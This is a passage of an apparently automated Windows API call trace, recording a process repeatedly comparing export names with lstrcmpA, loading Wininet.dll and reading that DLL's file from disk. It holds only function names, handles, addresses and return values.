lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtxWorker") returned 1 [0088.243] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddResourceAttributeAce") returned 1 [0088.243] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0088.243] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddScopedPolicyIDAce") returned 1 [0088.243] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSecureMemoryCacheCallback") returned 1 [0088.243] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredContinueHandler") returned 1 [0088.243] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredExceptionHandler") returned 1 [0088.243] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AdjustCalendarDate") returned 1 [0088.243] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocConsole") returned -1 [0088.243] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPages") returned 1 [0088.243] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPagesNuma") returned 0 [0089.293] GetProcessHeap () returned 0x5b0000 [0089.293] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5dc590 | out: hHeap=0x5b0000) returned 1 [0089.293] GetProcessHeap () returned 0x5b0000 [0089.293] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5c92c0 [0089.293] LoadLibraryA (lpLibFileName="Wininet.dll") returned 0x7ffc51070000 [0089.306] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0089.306] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0089.457] GetModuleFileNameA (in: hModule=0x7ffc51070000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")) returned 0x1f [0089.457] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0089.458] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0089.458] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0089.458] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=2647552) returned 1 [0089.458] GetProcessHeap () returned 0x5b0000 [0089.458] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x286600) returned 0x40e0040 [0089.468] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0089.468] ReadFile (in: hFile=0x140, lpBuffer=0x40e0040, nNumberOfBytesToRead=0x286600, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x40e0040*, lpNumberOfBytesRead=0x14f5a4*=0x286600, lpOverlapped=0x0) returned 1 [0089.687] CloseHandle (hObject=0x140) returned 1 [0089.846] lstrcmpA (lpString1="AppCacheCheckManifest", lpString2="AppCacheCheckManifest") returned 0 [0089.846] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCheckManifest") returned 1 [0089.847] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCloseHandle") returned 0 [0089.847] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCheckManifest") returned 1 [0089.847] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCloseHandle") returned 1 [0089.847] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCreateAndCommitFile") returned 0 [0089.847] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCheckManifest") returned 1 [0089.847] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCloseHandle") returned 1 [0089.847] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0089.847] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheDeleteGroup") returned 0 [0089.847] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCheckManifest") returned 1 [0089.847] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCloseHandle") returned 1 [0089.847] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0089.847] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteGroup") returned 1 [0089.847] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteIEGroup") returned 0 [0089.847] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCheckManifest") returned 1 [0089.847] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCloseHandle") returned 1 [0089.847] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCreateAndCommitFile") returned 1 [0089.847] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteGroup") returned 1 [0089.847] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteIEGroup") returned 1 [0089.847] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDuplicateHandle") returned 0 [0089.847] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCheckManifest") returned 1 [0089.847] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCloseHandle") returned 1 [0089.847] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCreateAndCommitFile") returned 1 [0089.847] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteGroup") returned 1 [0089.848] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteIEGroup") returned 1 [0089.848] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDuplicateHandle") returned 1 [0089.848] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheFinalize") returned 0 [0089.848] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0089.848] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0089.848] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0089.848] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0089.848] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0089.848] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0089.848] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFinalize") returned 1 [0089.848] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFreeDownloadList") returned 0 [0089.848] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCheckManifest") returned 1 [0089.848] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCloseHandle") returned 1 [0089.848] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0089.848] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0089.848] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0089.848] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0089.848] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFinalize") returned 1 [0089.848] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0089.848] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeGroupList") returned 0 [0089.848] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCheckManifest") returned 1 [0089.848] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCloseHandle") returned 1 [0089.849] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0089.849] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteGroup") returned 1 [0089.849] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0089.849] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDuplicateHandle") returned 1 [0089.849] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFinalize") returned 1 [0089.849] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeDownloadList") returned 1 [0089.849] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeGroupList") returned 1 [0089.849] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeIESpace") returned 0 [0089.849] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCheckManifest") returned 1 [0089.849] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCloseHandle") returned 1 [0089.849] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0089.849] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteGroup") returned 1 [0089.849] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0089.849] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDuplicateHandle") returned 1 [0089.849] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFinalize") returned 1 [0089.849] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeDownloadList") returned 1 [0089.849] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeGroupList") returned 1 [0089.849] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeIESpace") returned 1 [0089.849] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeSpace") returned 0 [0089.849] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0089.849] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0089.849] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0089.849] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0089.849] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0089.849] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0089.849] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFinalize") returned 1 [0089.850] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeDownloadList") returned 1 [0089.850] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeGroupList") returned 1 [0089.850] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeIESpace") returned 1 [0089.850] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeSpace") returned 1 [0089.850] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheGetDownloadList") returned 0 [0089.850] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCheckManifest") returned 1 [0089.850] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCloseHandle") returned 1 [0089.850] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0089.850] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteGroup") returned 1 [0089.850] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0089.850] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0089.850] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFinalize") returned 1 [0089.850] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0089.850] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeGroupList") returned 1 [0089.850] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeIESpace") returned 1 [0089.850] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeSpace") returned 1 [0089.850] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetDownloadList") returned 1 [0089.850] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetFallbackUrl") returned 0 [0089.850] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCheckManifest") returned 1 [0089.850] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCloseHandle") returned 1 [0089.850] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0089.850] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0089.850] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0089.850] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0089.851] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFinalize") returned 1 [0089.851] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0089.851] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0089.851] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0089.851] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeSpace") returned 1 [0089.851] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0089.851] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0089.851] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetGroupList") returned 0 [0089.851] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCheckManifest") returned 1 [0089.851] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCloseHandle") returned 1 [0089.851] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0089.851] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0089.851] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0089.851] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0089.851] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFinalize") returned 1 [0089.851] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0089.851] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0089.851] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0089.851] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeSpace") returned 1 [0089.851] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0089.851] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0089.851] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetGroupList") returned 1 [0089.851] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetIEGroupList") returned 0 [0089.851] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCheckManifest") returned 1 [0089.851] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCloseHandle") returned 1 [0089.851] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCreateAndCommitFile") returned 1 [0089.851] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteGroup") returned 1 [0089.851] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteIEGroup") returned 1 [0089.852] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDuplicateHandle") returned 1 [0089.852] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFinalize") returned 1 [0089.852] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeDownloadList") returned 1 [0089.852] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeGroupList") returned 1 [0089.852] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeIESpace") returned 1 [0089.852] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeSpace") returned 1 [0089.852] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetDownloadList") returned 1 [0089.852] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetFallbackUrl") returned 1 [0089.852] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetGroupList") returned 1 [0089.852] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetIEGroupList") returned 1 [0089.852] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetInfo") returned 0 [0089.852] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCheckManifest") returned 1 [0089.852] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCloseHandle") returned 1 [0089.852] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0089.852] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteGroup") returned 1 [0089.852] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0089.852] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0089.852] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFinalize") returned 1 [0089.853] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0089.853] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeGroupList") returned 1 [0089.853] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeIESpace") returned 1 [0089.853] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeSpace") returned 1 [0089.853] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetDownloadList") returned 1 [0089.853] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetFallbackUrl") returned 1 [0089.853] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetGroupList") returned 1 [0089.853] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetIEGroupList") returned 1 [0089.853] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetInfo") returned 1 [0089.853] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetManifestUrl") returned 0 [0089.853] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCheckManifest") returned 1 [0089.853] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCloseHandle") returned 1 [0089.853] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0089.853] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteGroup") returned 1 [0089.853] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteIEGroup") returned 1 [0089.853] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDuplicateHandle") returned 1 [0089.853] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFinalize") returned 1 [0089.853] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeDownloadList") returned 1 [0089.854] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeGroupList") returned 1 [0089.854] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeIESpace") returned 1 [0089.854] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeSpace") returned 1 [0089.854] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetDownloadList") returned 1 [0089.854] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetFallbackUrl") returned 1 [0089.854] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetGroupList") returned 1 [0089.854] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetIEGroupList") returned 1 [0089.854] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetInfo") returned 1 [0089.854] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetManifestUrl") returned 1 [0089.854] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheLookup") returned 0 [0089.854] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCheckManifest") returned 1 [0089.854] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCloseHandle") returned 1 [0089.854] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCreateAndCommitFile") returned 1 [0089.854] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteGroup") returned 1 [0089.854] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteIEGroup") returned 1 [0089.854] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDuplicateHandle") returned 1 [0089.854] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFinalize") returned 1 [0089.854] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeDownloadList") returned 1 [0089.854] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeGroupList") returned 1 [0089.854] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeIESpace") returned 1 [0089.854] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeSpace") returned 1 [0089.854] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetDownloadList") returned 1 [0089.854] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetFallbackUrl") returned 1 [0089.854] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetGroupList") returned 1 [0089.854] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetIEGroupList") returned 1 [0089.854] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetInfo") returned 1 [0089.854] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetManifestUrl") returned 1 [0089.854] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheLookup") returned 1 [0089.854] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="CommitUrlCacheEntryA") returned 0 [0089.855] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCheckManifest") returned 1 [0089.855] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCloseHandle") returned 1 [0089.855] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCreateAndCommitFile") returned 1 [0089.855] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteGroup") returned 1 [0089.855] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteIEGroup") returned 1 [0089.855] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDuplicateHandle") returned 1 [0089.855] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFinalize") returned 1 [0089.855] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeDownloadList") returned 1 [0089.855] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeGroupList") returned 1 [0089.855] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeIESpace") returned 1 [0089.855] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeSpace") returned 1 [0089.855] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetDownloadList") returned 1 [0089.855] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetFallbackUrl") returned 1 [0089.855] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetGroupList") returned 1 [0089.855] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetIEGroupList") returned 1 [0089.855] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetInfo") returned 1 [0089.855] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetManifestUrl") returned 1 [0089.856] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheLookup") returned 1 [0089.856] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryA") returned 1 [0089.856] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryBinaryBlob") returned 0 [0089.856] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCheckManifest") returned 1 [0089.856] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCloseHandle") returned 1 [0089.856] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCreateAndCommitFile") returned 1 [0089.856] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteGroup") returned 1 [0089.856] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteIEGroup") returned 1 [0089.856] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDuplicateHandle") returned 1 [0089.856] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFinalize") returned 1 [0089.856] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeDownloadList") returned 1 [0089.856] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeGroupList") returned 1 [0089.856] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeIESpace") returned 1 [0089.856] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeSpace") returned 1 [0089.856] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetDownloadList") returned 1 [0089.856] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetFallbackUrl") returned 1 [0089.856] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetGroupList") returned 1 [0089.856] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetIEGroupList") returned 1 [0089.856] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetInfo") returned 1 [0089.856] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetManifestUrl") returned 1 [0089.856] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheLookup") returned 1 [0089.856] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryA") returned 1 [0089.856] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryBinaryBlob") returned 1 [0089.856] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryW") returned 0 [0089.856] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCheckManifest") returned 1 [0089.856] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCloseHandle") returned 1 [0089.857] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCreateAndCommitFile") returned 1 [0089.857] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteGroup") returned 1 [0089.857] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteIEGroup") returned 1 [0089.857] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDuplicateHandle") returned 1 [0089.857] 